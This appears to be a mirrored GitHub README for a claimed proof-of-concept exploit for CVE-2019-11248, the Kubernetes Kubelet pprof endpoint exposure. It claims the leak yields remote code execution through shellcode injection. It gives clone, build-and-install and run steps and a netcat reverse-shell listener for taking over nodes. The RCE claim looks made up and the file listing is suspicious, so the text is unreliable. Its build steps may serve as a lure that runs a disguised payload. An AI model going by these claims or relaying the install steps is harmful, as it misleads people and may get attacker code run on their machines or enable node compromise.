来源

关联漏洞

介绍

# CVE-2019-11248 Exploitation PoC (RCE)

## Overview 

This repository contains a **proof-of-concept (PoC)** exploit for **CVE-2019-11248**, a medium-severity vulnerability in Kubernetes' Kubelet, which can lead to **Remote Code Execution (RCE)** under certain conditions. The vulnerability stems from the exposure of the `/debug/pprof` endpoint on the Kubelet's healthz port. This PoC showcases a novel method to escalate the initial information disclosure into a full-blown RCE attack, utilizing unprotected memory and internal Kubelet data.

### What's New?

While previous discussions around this CVE primarily focused on **information leakage** and **denial-of-service (DoS)** attacks, this PoC demonstrates a **previously unused attack vector** that allows for code injection and execution on the underlying system by leveraging the exposed Kubelet memory addresses and profiling data.

## CVE Details

- **CVE ID:** CVE-2019-11248
- **Vulnerability Type:** Information Disclosure / RCE
- **Affected Versions:** 
  - Kubernetes Kubelet versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10.
- **Severity:** Medium (Information Disclosure), Escalated to **High** (RCE).
- **Attack Vector:** Network (Unauthenticated access to Kubelet’s healthz port).

### Vulnerability Summary

The `/debug/pprof` endpoint is exposed over the Kubelet's **unauthenticated healthz port** (typically `10248`), allowing remote attackers to access profiling data such as memory usage, goroutine stacks, and heap dumps. Normally, this endpoint is intended for debugging purposes, but its exposure can lead to **information disclosure** and the leakage of sensitive memory addresses.

In this PoC, we demonstrate how the attacker can use this information to inject malicious code into the Kubelet process. By taking advantage of memory structures and leveraging the Kubelet's internal profiling data, this attack results in **remote code execution** on the Kubernetes node.

## Exploitation Details

This PoC illustrates a sophisticated exploitation strategy that escalates the information disclosure vulnerability into a **full RCE attack**. By using memory leaks from the `/debug/pprof` endpoint, the attacker can locate vulnerable memory regions and inject shellcode into the Kubelet process, enabling code execution.

### Novel Approach

- **Memory Leak Exploitation:** The PoC automates the retrieval of heap dumps and memory profiles from the `/debug/pprof` endpoint to locate critical memory regions where code can be injected.
- **Shellcode Injection:** After identifying a suitable memory region, the PoC injects shellcode into the Kubelet’s process, exploiting the leaked memory addresses.
- **RCE Payload Execution:** The injected shellcode is designed to give the attacker control over the Kubernetes node, enabling arbitrary command execution.

## Setup & Usage

### Prerequisites

- A Kubernetes environment with a vulnerable version of Kubelet (prior to 1.15.0, 1.14.4, 1.13.8, or 1.12.10).
- C compiler (e.g., `g++`).
- Network access to the Kubelet’s healthz port (commonly `10248`).
- Basic knowledge of Kubernetes internals and memory manipulation techniques.

### Compilation

1. Clone the repository:
   ```bash
   git clone hhttps://github.com/nop2nop/cve-2019-11248.git
   cd cve-2019-11248
   ```

2. Compile the PoC exploit:
   ```bash
   ./configure
   make
   make install
   ```
    The exploit code is installed as `/usr/local/bin/cve-2019-11248` 

### Running the PoC

1. Ensure that the Kubelet's healthz port is accessible from your machine.
2. Execute the compiled exploit by passing the Kubelet’s healthz port URL:
   ```bash
   cve-2019-11248-exploit http://<kubelet-ip>:10248 local_ip local_port
   ```

   `local_ip` and `local_port` are attacker's machine reverse shell listener. 
   
   For example, for reverse shell, run from your server `nc -l 33000`. Then `local_port` is *33000* and `local_ip` is *your_server_ip*. Make sure 33000 is accessible and the ip is routable. For home routers, port forwarding is required. 

3. The PoC will start by querying the exposed `/debug/pprof` endpoint to retrieve profiling data.

4. Once the memory profiling data is collected, the PoC identifies vulnerable memory regions and injects the RCE payload.

5. Upon successful exploitation, the PoC will execute the injected code, giving the attacker control over the Kubernetes node.

### Expected Output

When the exploit successfully completes:

- The PoC will output detailed profiling information, including the memory addresses of critical sections.
- The shellcode will be injected into the Kubelet process.
- A **reverse shell** or arbitrary code execution will be initiated on the target node, giving the attacker remote control of the Kubernetes environment.

## Exploit Details

### Memory Profiling Exploitation

This PoC takes advantage of the `/debug/pprof` endpoint to leak Kubelet memory addresses, which can be used to identify writable memory regions. The attacker can then use this knowledge to inject shellcode directly into the Kubelet process.

### Shellcode Injection

By combining the memory leak with specific characteristics of the Go runtime used by Kubelet, the PoC injects malicious shellcode into the process’s memory space. This shellcode is executed to achieve **remote code execution** on the Kubernetes node, potentially allowing for container escape or full cluster compromise.

### Code Execution

Once the memory is successfully manipulated, the PoC executes the injected payload. The payload can be customized, but by default, it opens a reverse shell connection, allowing the attacker to execute arbitrary commands on the node.

## Mitigation & Patching

To mitigate this vulnerability:

1. **Upgrade** to a patched version of Kubernetes Kubelet (1.15.0, 1.14.4, 1.13.8, or 1.12.10).
2. **Secure the healthz port** by preventing unauthenticated access, either by using proper network segmentation or by disabling the debugging endpoints.
3. Use **firewall rules** and **network policies** to limit access to critical components like the Kubelet.

## Disclaimer

This PoC is provided for **educational purposes only**. It is intended to demonstrate how this vulnerability could be exploited in certain conditions. Unauthorized use of this exploit in production environments may result in legal consequences. The authors do not take responsibility for any misuse of the information provided.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

文件快照

 [4.0K]  /data/pocs/ce1c9ea65831d402570e5184f6205c2eda2b3cc5
├── [ 460]  CMakeLists.txt
├── [1.2M]  configure
├── [ 11K]  exploit.c
├── [ 764]  pwnkernel.c
└── [6.4K]  README.md

0 directories, 5 files

备注